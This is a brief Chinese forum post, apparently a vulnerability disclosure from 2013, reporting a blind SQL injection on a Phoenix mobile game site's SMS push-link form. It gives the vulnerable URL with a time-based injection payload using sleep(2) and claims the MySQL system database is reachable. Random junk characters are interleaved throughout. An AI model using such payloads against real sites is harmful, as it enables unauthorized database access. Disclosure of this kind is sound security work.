简要描述:; `- z4 W+ ]3 x' v; w
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。: N7 W, f; v4 \. D S& v7 C
# I; }, @& m+ _
详细说明:
# J* T8 Y+ f6 k- w; k6 ~3 B. k存在SQL盲注url:" u3 L8 R/ g; Z! J9 W+ V
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1% `% P" X/ p+ l
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png# \- ^3 ]6 p9 o e4 ~: w7 h
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
# o9 {, q! E- [6 s2 Ahttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg, r6 g) b: H' X
5 R s v0 U/ R4 [1 ^: @( T
能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对